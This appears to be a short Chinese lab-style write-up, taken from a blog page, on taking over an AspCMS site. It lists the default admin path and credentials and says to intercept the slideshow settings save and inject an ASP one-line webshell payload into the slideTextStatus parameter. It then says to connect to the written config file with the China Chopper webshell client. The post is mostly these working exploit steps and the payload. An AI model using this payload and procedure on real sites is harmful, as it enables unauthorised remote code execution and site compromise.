浏览器访问环境
1.进入后台管理
aspcms默认的后台登录地址为/admin_aspcms/index.asp
用户名:admin 密码:123456
2.点击扩展功能里面的幻灯片设置
3.在保存的时候抓包
抓包修改slideTextStatus参数为一句话木马
1%25><%25Eval(Request (chr(65)))%25><%25
4.访问asp的配置文件 并连接
aspcms的默认配置文件路径为/config/aspcms_config
使用菜刀可以连接成功
扫一扫
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
